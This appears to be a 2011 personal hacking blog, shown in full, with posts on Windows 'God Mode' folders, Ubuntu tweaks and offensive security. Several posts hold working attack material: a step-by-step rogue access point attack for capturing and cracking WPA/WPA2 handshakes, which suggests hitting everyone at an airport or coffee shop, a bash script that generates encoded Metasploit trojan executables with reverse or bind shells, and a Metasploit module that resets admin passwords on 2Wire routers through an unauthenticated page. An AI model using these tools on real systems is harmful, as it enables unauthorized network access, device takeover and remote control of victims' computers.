Monday, October 3, 2011

The Many Faces Of God Mode In Windows 7 - With Script

Some of you may already be familiar with "God Mode" in windows 7. It was a special tool which the Windows developer team left for their sake to make enabling and disabling several of Windows functions quick and easy. However there are more than one of these, I have found 39 and will show you how to access them and also provide a script to do that. It should be noted that these are for Windows 7 and will not work on windows XP (although there are some GUID tricks there to, these just aren't them). The default God Mode was to add ".{ED7BA470-8E54-465E-825C-99712043E01C}" to the end of a folder. So for example if you create a folder titled "Main GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}" it would create a folder called "Main GodMode" which when double-clicked would give you what you see below instead of an empty folder.

God Mode folder View

However, this is just another parlor trick by the windows explorer. Looking at it from the command line and you will see it's still just a folder, But windows handles it differently.

CMD view of the folder

Looking into the Windows Registry, you can see it is actually accessing a DLL Function in the shell32.dll file in the system32 folder.

Registry view of HKEY_CLASSES_ROOT\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C}

With some searching I was able to create a batch file script that will create these "Modules". The script will create a folder in where every it is run called "GodModes" then create 39 known God Mode folders under it for you to use, which gives you a decent "this is what the Control Panel should have been" Folder.

View of the GodMode Folder from the script.

Without further delay. Here is the script.
==================================================================
@echo off
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
rem \\ this script will create a folder in it's \\
rem \\ Current Directory called GodModes and then \\
rem \\ create several "God Mode folders under it \\
rem \\ Which in Windows vista\7 will trigger some \\
rem \\ Control Panel as well as hidden functions \\
rem \\ Hidden in some of windows system DLLs. \\
rem \\ \\
rem \\ Note: Some of these do NOT work on vista. \\
rem \\ For Those it will just show a folder. \\
rem \\ Also one of these only works on win7 Ultimate\\
rem \\ Which is the BitLocker Module \\
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
echo.
echo ***********************************************
echo Enable Windows 7 God Mode Modules v1.0
echo ***********************************************
echo Coded By: Travis Phillips
echo on: 10/03/2011
echo.
echo [*] Creating folder .\GodMode
mkdir "GodModes"
echo.
echo [*] Changing to .\GodMode
cd GodModes
echo.
echo [*] Creating GodMode "Default Geolocation"...
mkdir "Default Geolocation.{00C6D95F-329C-409a-81D7-C46C66EA7F33}"
echo.
echo [*] Creating GodMode "Biometrics"...
mkdir "Biometrics.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}"
echo.
echo [*] Creating GodMode "Power Plan"...
mkdir "Power Plan.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}"
echo.
echo [*] Creating GodMode "Personalization Control Panel"...
mkdir "Personalization Control Panel.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}"
echo.
echo [*] Creating GodMode "Taskbar Notitification Area"...
mkdir "Taskbar Notitification Area.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}"
echo.
echo [*] Creating GodMode "Administration Tools"...
mkdir "Administration Tools.{D20EA4E1-3957-11d2-A40B-0C5020524153}"
echo.
echo [*] Creating GodMode " Windows Vault (Credential Manager - Auto Logon)"...
mkdir "Windows Vault (auto logon).{1206F5F1-0569-412C-8FEC-3204630DFB70}"
echo.
echo [*] Creating GodMode "Ease of Access"...
mkdir "Ease of Access.{D555645E-D4F8-4c29-A827-D93C859C4F2A}"
echo.
echo [*] Creating GodMode "Install Program from the Network"...
mkdir "Install Program from the Network.{15eae92e-f17a-4431-9f28-805e482dafd4}"
echo.
echo [*] Creating GodMode "Network Map"...
mkdir "Network Map.{E7DE9B1A-7533-4556-9484-B26FB486475E}"
echo.
echo [*] Creating GodMode "Default Programs"...
mkdir "Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}"
echo.
echo [*] Creating GodMode "Windows SideShow"...
mkdir "Windows SideShow.{E95A4861-D57A-4be1-AD0F-35267E261739}"
echo.
echo [*] Creating GodMode "DOT NET Framework Modules"...
mkdir "DOT NET Framework Modules.{1D2680C9-0E2A-469d-B787-065558BC7D43}"
echo.
echo [*] Creating GodMode "GPS Sensors"...
mkdir "GPS Sensors.{E9950154-C418-419e-A90A-20C5287AE24B}"
echo.
echo [*] Creating GodMode "Manage Wireless Networks"...
mkdir "Manage Wireless Networks.{1FA9085F-25A2-489B-85D4-86326EEDCD87}"
echo.
echo [*] Creating GodMode "Network"...
mkdir "Network.{208D2C60-3AEA-1069-A2D7-08002B30309D}"
echo.
echo [*] Creating GodMode "My Computer"...
mkdir "My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
echo.
echo [*] Creating GodMode "Computers and Devices"...
mkdir "Computers and Devices.{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"
echo.
echo [*] Creating GodMode "Manage Printers"...
mkdir "Manage Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}"
echo.
echo [*] Creating GodMode "Recent Places"...
mkdir "Recent Places.{22877a6d-37a1-461a-91b0-dbda5aaebc99}"
echo.
echo [*] Creating GodMode "Bluetooth Devices"...
mkdir "Bluetooth Devices.{28803F59-3A75-4058-995F-4EE5503B023C}"
echo.
echo [*] Creating GodMode "Workspaces Center (Remote Connections)"...
mkdir "Workspaces Center (Remote Connections).{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
echo.
echo [*] Creating GodMode "Windows Firewall"...
mkdir "Windows Firewall.{4026492F-2F69-46B8-B9BF-5654FC07E423}"
echo.
echo [*] Creating GodMode "Favorites"...
mkdir "Favorites.{323CA680-C24D-4099-B94D-446DD2D7249E}"
echo.
echo [*] Creating GodMode "Windows Update"...
mkdir "Windows Update.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}"
echo.
echo [*] Creating GodMode "Rate and Improve Computer Preformance"...
mkdir "Rate and Improve Computer Preformance.{78F3955E-3B90-4184-BD14-5397C15F1EFC}"
echo.
echo [*] Creating GodMode "Main Godmode"...
mkdir "Main Godmode.{ED7BA470-8E54-465E-825C-99712043E01C}"
echo.
echo [*] Creating GodMode "Speech Recognition"...
mkdir "Speech Recognition.{58E3C745-D971-4081-9034-86E34B30836A}"
echo.
echo [*] Creating GodMode "User Accounts"...
mkdir "User Accounts.{60632754-c523-4b62-b45c-4172da012619}"
echo.
echo [*] Creating GodMode "Action Center"...
mkdir "Action Center.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}"
echo.
echo [*] Creating GodMode "Backup and Restore"...
mkdir "Backup and Restore.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}"
echo.
echo [*] Creating GodMode "Backup and Restore"...
mkdir "Display.{C555438B-3C23-4769-A71F-B6D3D9B6053A}"
echo.
echo [*] Creating GodMode "Recovery"...
mkdir "Recovery.{9FE63AFD-59CF-4419-9775-ABCC3849F861}"
echo.
echo [*] Creating GodMode "AutoPlay"...
mkdir "AutoPlay.{9C60DE1E-E5FC-40f4-A487-460851A8D915}"
echo.
echo [*] Creating GodMode "BitLocker Drive Encryption (Ultimate edition only)"...
mkdir "BitLocker Drive Encryption (Ultimate edition only).{D9EF8727-CAC2-4e60-809E-86F80A666C91}"
echo.
echo [*] Creating GodMode "Font Settings"...
mkdir "Font Settings.{93412589-74D4-4E4E-AD0E-E0CB621440FD}"
echo.
echo [*] Creating GodMode "Parental Controls"...
mkdir "Parental Controls.{96AE8D84-A250-4520-95A5-A47A7E3C548B}"
echo.
echo [*] Creating GodMode "Sync Center"...
mkdir "Sync Center.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}"
echo.
echo [*] Creating GodMode "System Information"...
mkdir "System Information.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}"
echo.
echo [*] Changing back to .\
cd ..
==================================================================

Friday, September 2, 2011

No Access Point? No Problem!: How to get a WPA\WPA2 keys 4-way handshake using Airbase-ng

Today we are going to look into how to get a WPA\WPA2 keys 4-way handshake from a client using Airbase-ng without them being connected or near their access point. This is useful as a lot of machines will throw beacon probes out for old access points they've connected to (you will see them while running airodump-ng at the bottom right). This means it is looking for that Access Point and wants to connect to it. What we will do with Airbase-ng is pretend we are that access point and let it attempt to connect to us.

So for this tutorial I will be using:
- One Attacker Box running BackTrack 5
- One laptop running XP or 7 pre-configured to connect to a SSID of linksys with a WPA2 key set

Step 1: Going in to Monitor Mode

With that said let's first get things setup on the hacking machine by setting our wireless card into monitor mode using airmon-ng. since my wireless interface is "wlan0" I would use the command "airmon-ng start wlan0". This will give us a virtual interface called "mon0" which is in monitor mode

Airmon-ng setting wlan0 to monitor mode.

Step 2a: Setting up the fake AP (Single Known Target Method)

Use this method if you know the Targets AP ESSID or you only want to attack that one; otherwise use Step 2b instead but still read this section to get a better understanding first. Next let's taking a moment to look at the help options for airbase-ng, pictured below.

Airbase-ng Help

So now let's set up our options here. For this attack I'm going to use the following command.(Note: This is case sensitive so pay close attention to this)

airbase-ng -F ./Desktop/WPA-attack.cap --essid linksys -Z 2 -c 1 -i mon0 mon0


I owe you a little explanation of what the command does. here's quick break down of what this command does as per the help screen.

usage: airbase-ng <options> <replay interface>
  • -F prefix : write all sent and received frames into pcap file
  • --essid <ESSID> : specify a single ESSID (short -e)
  • -Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • -c channel : sets the channel the fake AP is going to run on
  • -i iface : capture packets from this interface
So, basically this command will set up mon0 to listen and answer (-i mon0 mon0) as a WPA2-TKIP access Point (-Z 2) running on channel 1 (-c 1) with the SSID of linksys (--essid linksys) and log all packets to a log file on the desktop (-F ./Desktop/WPA-attack.cap).

Airbase-ng in Action

Above is a console picture of it in action. As you can see in the last 3 lines the machine is attempting to authenicate to our fake AP, once you see this line once it is safe to open another terminal and try to open the pcap file (in my case ./Desktop/WPA-attack.cap-01.cap) with aircrack-ng to confirm you got a handshake.

Aircrack-ng shows we have the handshake!

So on this note, we see we got a handshake!

Step 2b: Setting up the fake AP (Unknown Target Method)

Warning: This method will attempt to attack every probe it sees! if you didn't know the ESSID of the client or just wanted to attack everyone in the area (airport or coffee shop anyone?) use this type of command.

airbase-ng -P -C 500 -Z 2 -c 1 -i mon0 -F ./Desktop/Probe_hits mon0

It's Pretty much the same as the one from step 2 expect instead of using "--essid linksys" we used "-P -C 500" (case sensitive. So note they are uppercase switches)

usage: airbase-ng <options> <replay interface>
  • -F prefix : write all sent and received frames into pcap file
  • -P : respond to all probes, even when specifying ESSIDs
  • -C seconds : enables beaconing of probed ESSID values (requires -P)
  • -Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • -c channel : sets the channel the AP is running on
  • -i iface : capture packets from this interface

Airbase-ng Responding to all beacons.

With this approach I changed the victims wireless connection settings from linksys to "testing" as you can see it found it, repeated it, and allow the client to connect. Thus also getting the handshake same as above.

Step 3a: Cracking it with Cowpatty and rainbow tables

This is my preferred method of cracking WPA/WPA2. However Cowpatty (even the install on backtrack) will by default not detect the 4-way handshake obtained with these methods unless you patch it. You can patch it with an article I wrote on how to do this step-by-step or via a script that I coded for that, both of which can be found here. With Cowpatty patch just use the following command:

Command to crack using Cowpatty.

cowpatty -r ./Desktop/WPA-attack.cap-01.cap -s linksys -d linksysHashTable

In this command the -r points cowpatty to the Capture file with the handshake. The -s is used to indicate the ESSID to the program. Finally, the -d points to my rainbow table for this SSID. If you need rainbow tables for Cowpatty the I recommend you checkout the church of WiFi set from renderlabs webpage as they have a free set containing 33GB of tables made from the top 1,000 SSIDs seen on WiGLE (Wireless Geographic Logging Engine) which is a community for wardrivers to upload their GPS wardriving data and mapped on the site for all to see.



If that image isn't encourgement to get your rainbow tables I don't know what is. Cracked after 395,442 try in about 2.5 seconds!!! So worth the download and space to keep these handy. If the SSID is one not in the kit you can make it following this post here.

Step 3b: Cracking it with aircrack-ng using a Dictionary

In this attack we will use Aircrack-ng with a the default dictionary that comes with BackTrack (located under /pentest/password/wordlist/darkc0de.lst). This is just to show you a second method and give you something to compare the time difference on rainbow table vs. dictionary attacks. To run it just do the following:

aircrack-ng ./Desktop/WPA-attack.cap-01.cap -w /pentest/password/wordlist/darkc0de.lst

Aircrack-ng target selection
On mine it was number two but just hit the number next to the network with the handshake you are attacking. You should see it start to run the attack.

Aircrack-ng Finished Cracking
As you can see this worked too but it took 16 mins instead of 2 seconds. Whichever method is easier for you, that's the one to use. Hope this helps some people, if you have any questions feel free to leave a question in the comments area.

Enjoy and stay out of trouble! ;-)

Tuesday, August 23, 2011

installDVWA.sh - Script to Download, Configure, and launch Damn Vulnerable Web App on Backtrack 5

So I recently need to automate this process as it had to be done on over 30 machines and I'm lazy and if I have more than once it's getting automated. This thing will get DVWA (Damn Vulnerable Web App) download, unzipped, upload in your web root, configured, and start apache and mysql, setup the mysql database with the DVWA data in ~30-45 seconds.

So first a screenshot of it:

ScreenShot of installDVWA.sh

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#/bin/bash
echo -e "\n#######################################"
echo -e "# Damn Vulnerable Web App Installer Script #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Changing directory to /var/www..."
cd /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Removing default index.html..."
rm index.html > /dev/null
echo -e "Done!\n"

echo -n "[*] Changing to Temp Directory..."
cd /tmp
echo -e "Done!\n"

echo "[*] Downloading DVWA..."
wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
echo -e "Done!\n"

echo -n "[*] Unzipping DVWA..."
unzip DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Deleting the zip file..."
rm DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Copying dvwa to root of Web Directory..."
cp -R dvwa/* /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Clearing Temp Directory..."
rm -R dvwa > /dev/null
echo -e "Done!\n"

echo -n "[*] Enabling Remote include in php.ini..."
cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1
sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.ini
rm /etc/php5/apache2/php.ini1
echo -e "Done!\n"

echo -n "[*] Enabling write permissions to /var/www/hackable/upload..."
chmod 777 /var/www/hackable/uploads/
echo -e "Done!\n"

echo -n "[*] Starting Web Service..."
service apache2 start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Starting MySQL..."
service mysql start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Updating Config File..."
cp /var/www/config/config.inc.php /var/www/config/config.inc.php1
sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 > /var/www/config/config.inc.php
rm /var/www/config/config.inc.php1
echo -e "Done!\n"

echo -n "[*] Updating Database..."
wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &> /dev/null
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'
echo -e "Done!\n"

echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"
firefox http://127.0.0.1/login.php &> /dev/null &
echo -e "\nDone!\n"
echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"
==================================================================

Thursday, July 14, 2011

Script to simple using msfpayload & msfencode to create metasploit payload trojans

The following is a script I coded to simplify the ease of use for using msfpayload and msfencode to create a windows based trojan and set up the listener. Let's face it, scripting is faster and easier. Also insures it is uniform and automated.

The script will do the following:
  • Determine your IP address automatically for the LHOST of the payload.
  • Ask if you want a shell or meterpreter
  • Ask if you want it reverse connection or Bind port TCP
  • Request the Port number.
  • at that point it will create two files
  • trojan.exe - your virus payload
  • msf_Trojan_Listener - a file with a one liner to create the metasploit listener that works with your payload.
  • Next it will start msfcli to create a listener.

Here is a screenshot of it in action:

Screen Shot 1 of msf_trojan_generator
Screen Shot 2 of msf_trojan_generator

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
ENCODINGTIMES=5
IP=`ifconfig | grep 'inet addr' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
echo -e "\n#######################################"
echo "# MSF Trojan Generator v1.0 #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e "\nYour IP = " $IP
echo -e -n "\n what type of trojan? \n 1) meterpreter \n 2) shell \n\n Which is it: "
read METERORSHELL
echo -e -n "\n What kind of trojan? \n 1) Reverse Connection \n 2) bind_TCP \n\n Which is it: "
read LISTENORREVERSE
echo -e -n "\n What port number are we going to use: "
read PORTNUM

if [ $LISTENORREVERSE = "1" ]; then
 LORR='reverse_tcp'
 LHOST='LHOST='
else
 LORR='bind_tcp'
 LHOST=''
 IP=''
 echo -e "\n Since you want a bind port\nwhat is the IP of the remote host: "
 read REMOTEHOST
 RH='RHOST='
fi

if [ $METERORSHELL = "1" ]; then
 SHELLTYPE='meterpreter'
else
SHELLTYPE='shell'
fi

echo -e "\n[*] Generating trojan with the following: \n -"$SHELLTYPE"/"$LORR "\n -"$LHOST$IP$RH$REMOTEHOST "\n -PORT=" $PORTNUM
echo -e "\n this can take some time. Please wait...\n"

msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo -e "\n[*] Done generating `pwd`/trojan.exe! \n"
ls -l trojan.exe
echo -e "\n[*] Now running listener:\n msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E\n\nNOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."
echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" > msf_Trojan_Listener
msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E

==================================================================

Wednesday, June 22, 2011

Metasploit module to reset admin password on 2wire wireless routers.

UPDATE: This module is now a part of metasploit. just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here

Here is a metaploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that doesn't verify if the user is authenticated nor remove itself after first time setup. This can be exploited to reset the password. Without further delay, here is the code.

on my ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

=====================================================
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => '2Wire Password Reset',
'Version' => '$Revision: 1 $',
'Description' => %Q{
This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
page that fails to check if a user is authenicated and doesn't remove or block after first access.
},
'Author' => 'Travis Phillips',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
], self.class)

end

def run
begin
print_status("Attempting to rest password to #{datastore['PASSWORD']} on #{rhost}\n")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/xslt',
'data' => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
}, 25)
if (res.code == 200)
if (res.headers['Set-Cookie'])
print_status("Password reset successful!\n")
end
end
end
end
end
=====================================================

Saturday, June 18, 2011

How to Generate Rainbow Tables for Cowpatty using genpmk to crack WPA/WPA2

Over the past few days I've had people ask me how to generate rainbow tables for Cowpatty. It's quite simple. Just a few things you should know first:

- Each table is for ONE ESSID. In WPA/WPA2, the SSID of the network is used as a salt to the encryption.

- You will want to find a good password dictionary file. I recommend the Renderlab church of wifi's password list found here.

- Passwords MUST be over 8 characters in length. So if you have a password list, weed out any smaller passwords.

And on with the show. Let's first look at the help screen.

genpmk 1.1 - WPA-PSK precomputation attack.
genpmk: Must specify a dictionary file with -f
Usage: genpmk [options]

-f Dictionary file
-d Output hash file
-s Network SSID
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

After precomputing the hash file, run cowpatty with the -d argument.

So, to generate a rainbow table we need to provide a dictionary, an SSID, and a output file for it to write the hashes. so using the above we can do the following

genpmk -f final-wordlist.txt -s HackMe -d HackMe

This will make it create a Rainbow table called "HackMe" which will contain hashes of all the passwords in the file "final-wordlist.txt" salted with the SSID "HackMe". The output of the shell should update as every 1,000 hashes are created.

The whole process isn't actually all that bad for time and the file size for a rainbow table using the password file I suggest is ~40 MB. Not to bad considering the speed boost it will give when you go to crack it.

Patch, Compile, and Installing coWPAtty 4.6 on Ubuntu

Cowpatty is a great tool for cracking WPA/WPA2 keys via either a dictionary attack or via rainbow tables. All it needs to see it a client connect to the network (this is called a "handshake"). However cowpatty isn't perfect and has a problem with reading handshakes incorrectly. After looking into this I found a way to install it with the patch on my Ubuntu box.

First we need to download the required files. If you already have them you can skip them.

sudo apt-get install build-essential
sudo apt-get install libssl-dev
sudo apt-get install libpcap0.8-dev
sudo apt-get install libdigest-hmac-perl

Next Download cowpatty 4.6

wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz

you should get b90fd36ad987c99e7cc1d2a05a565cbd as the MD5 sum. If so, extract and move into the directory using the following

tar -xvf cowpatty-4.6.tgz
cd cowpatty-4.6

Next we need to download the patch and patch the source code.

wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
patch < cowpatty-4.6-fixup16.patch

Next we will compile and install it and then test it

make
sudo make install
cd ..
cowpatty

If all goes well you should see the cowpatty help menu:

cowpatty 4.6 - WPA-PSK dictionary attack.
cowpatty: Must supply a pcap file with -r

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

Now if you're as lazy as me. Here's everything together to work as a script

#/bin/bash
echo -e "\n \e[1;31m[*] Installing build-essential\e[0m"
sudo apt-get -y install build-essential
echo -e "\n \e[1;34m[*] Installing libssl-dev\e[0m"
sudo apt-get -y install libssl-dev
echo -e "\n \e[1;34m[*] Installing libpcap0.8-dev\e[0m"
sudo apt-get -y install libpcap0.8-dev
echo -e "\n \e[1;34m[*] Installing libdigest-hmac-perl\e[0m"
sudo apt-get -y install libdigest-hmac-perl
echo -e "\n \e[1;34m[*] Downloading cowpatty-4.6.tgz\e[0m"
wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz
echo "\e[1;34mMD5 SHOULD BE b90fd36ad987c99e7cc1d2a05a565cbd\e[0m"
echo -e "\n \e[1;34m[*] Extracting cowpatty-4.6.tgz\e[0m"
tar -xvf cowpatty-4.6.tgz > /dev/null
cd cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Downloading Cowpatty Patch\e[0m"
wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Patching Cowpatty code"
patch < cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Compiling Cowpatty\e[0m"
make
echo -e "\n \e[1;34m[*] Installing cowpatty to system\e[0m"
sudo make install
echo -e "\n \e[1;34m[*] Removing Cowpatty Directory\e[0m"
cd .. > /dev/null
rm -r -f cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Removing cowpatty-4.6.tgz\e[0m"
rm cowpatty-4.6.tgz > /dev/null
echo -e "\n \e[1;34m[*] testing to see if cowpatty works\e[0m"
cowpatty
echo -e "\n \e[1;34m[*] Done!\e[0m"


Links:

http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz - Get coWPAtty here
http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch - Patch to fix several issues with cowpatty
http://www.renderlab.net/projects/WPA-tables/ - A place to get 33GB of Rainbow tables for free download.


Wednesday, March 16, 2011

How to make ubuntu 10.10 use Sun Java instead of OpenJDK

I had an issue where the default OpenJDK that comes with ubuntu 10.10 was not letting me run an applet I needed. Here is how in 6 commands you can switch from openJDK to Sun Java


sudo apt-get purge openjdk-6-jre openjdk-6-jre-headless
sudo add-apt-repository deb http archive.canonical.com/ maverick partner
sudo apt-get update
sudo apt-get install sun-java6-jre sun-java6-plugin
sudo apt-get install sun-java6-fonts
sudo update-java-alternatives --set java-6-sun


Line 1 : Removes OpenJDK from your machine
Line 2-3: Allows you to use the partner repository which has the sun packages and updates apt
Line 4-5: Installs the needed files needed for the Sun JRE to run
Line 6 : Tells your system to only use the sun java binaries.

Hope this helps

Tuesday, February 8, 2011

How To Move the Buttons on Ubuntu 10.04 from the Left to the Right with one command

So, Ubuntu decided to hop on the Apple bandwagon and move the buttons at the top of the window for close, minimize, maximize to the left. This annoyed me to no ends. So after some searching I found this simple one liner!

gconftool-2 --set /apps/metacity/general/button_layout --type string menu:minimize,maximize,close

(Shoutouts to http://www.junauza.com/2010/05/move-ubuntu-1004-window-buttons-from.html for finding this)